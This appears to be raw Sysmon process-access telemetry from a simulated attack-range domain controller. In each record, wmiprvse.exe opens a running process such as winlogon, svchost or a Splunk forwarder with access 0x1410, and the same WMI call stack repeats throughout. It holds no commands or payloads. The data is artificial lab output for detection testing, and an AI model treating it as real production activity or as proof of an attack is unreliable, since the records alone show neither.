15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786877Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786876Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786875Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786874Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786873Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786872Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786871Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786870Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786869Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786868Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786867Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786866Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786865Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786864Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786863Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786862Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786861Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786860Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786859Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786858Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 